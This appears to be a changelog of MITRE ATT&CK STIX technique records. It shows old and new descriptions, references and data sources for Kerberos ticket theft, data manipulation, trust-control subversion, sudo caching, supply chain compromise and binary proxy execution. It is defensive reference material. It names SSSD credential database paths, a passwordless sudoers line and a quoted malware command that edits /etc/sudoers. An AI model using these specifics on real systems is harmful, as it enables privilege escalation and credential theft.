| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:56:22.054000+00:00 | 2022-03-08 21:45:01.934000+00:00 |
| description | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
|
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
|
| x_mitre_data_sources[0] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Logon Session: Logon Session Metadata |
| x_mitre_data_sources[3] | Logon Session: Logon Session Metadata | File: File Access |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-02 15:17:40.505000+00:00 | 2022-04-19 23:03:49.461000+00:00 |
| description | Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| external_references[1]['source_name'] | FireEye APT38 Oct 2018 | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['source_name'] | DOJ Lazarus Sony 2018 | FireEye APT38 Oct 2018 |
| external_references[2]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://content.fireeye.com/apt/rpt-apt38 |
| x_mitre_data_sources[1] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | File: File Deletion |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:18:32.225000+00:00 | 2022-05-05 05:04:52.387000+00:00 |
| external_references[1]['source_name'] | SpectorOps Subverting Trust Sept 2017 | SpectorOps Code Signing Dec 2017 |
| external_references[1]['description'] | Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018. |
| external_references[1]['url'] | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec |
| external_references[2]['source_name'] | Securelist Digital Certificates | SpectorOps Subverting Trust Sept 2017 |
| external_references[2]['description'] | Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. | Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. |
| external_references[2]['url'] | https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf |
| external_references[3]['source_name'] | Symantec Digital Certificates | Securelist Digital Certificates |
| external_references[3]['description'] | Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. | Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. |
| external_references[3]['url'] | http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates | https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ |
| external_references[4]['source_name'] | SpectorOps Code Signing Dec 2017 | Symantec Digital Certificates |
| external_references[4]['description'] | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018. | Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. |
| external_references[4]['url'] | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec | http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Module: Module Load |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Metadata |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[4] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[6] | Module: Module Load | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control | |
| x_mitre_defense_bypassed | Process whitelisting |
| Old Description | New Description |
|---|---|
Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 01:03:26.306000+00:00 | 2022-03-14 16:28:19.781000+00:00 |
| description | Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
| x_mitre_data_sources[0] | Process: Process Metadata | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Metadata |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata', 'Sensor Health: Host Status'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018. | |
| external_references | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | |
| external_references | IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019. | |
| external_references | CAPEC-437 | |
| external_references | CAPEC-438 | |
| external_references | CAPEC-439 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-437 | |
| external_references | CAPEC-438 | |
| external_references | CAPEC-439 | |
| external_references | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | |
| external_references | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | |
| external_references | Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 19:32:28.382000+00:00 | 2022-04-28 16:03:22.870000+00:00 |
| description | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) |
| external_references[1]['source_name'] | capec | Avast CCleaner3 2018 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/437.html | https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities |
| external_references[2]['source_name'] | capec | Command Five SK 2011 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/438.html | https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
| external_references[3]['source_name'] | capec | IBM Storwize |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/439.html | https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E |
| external_references[4]['source_name'] | IBM Storwize | Symantec Elderwood Sept 2012 |
| external_references[4]['description'] | IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. |
| external_references[4]['url'] | https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| external_references[6]['source_name'] | Avast CCleaner3 2018 | Trendmicro NPM Compromise |
| external_references[6]['description'] | Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018. | Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. |
| external_references[6]['url'] | https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities | https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets |
| external_references[8]['source_name'] | Command Five SK 2011 | capec |
| external_references[8]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://capec.mitre.org/data/definitions/437.html |
| external_references[9]['source_name'] | Symantec Elderwood Sept 2012 | capec |
| external_references[9]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://capec.mitre.org/data/definitions/438.html |
| external_references[10]['source_name'] | Trendmicro NPM Compromise | capec |
| external_references[10]['url'] | https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets | https://capec.mitre.org/data/definitions/439.html |
| x_mitre_version | 1.2 | 1.5 |
| Old Description | New Description |
|---|---|
| Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:13:19.412000+00:00 | 2022-04-18 14:52:08.678000+00:00 |
| name | Signed Binary Proxy Execution | System Binary Proxy Execution |
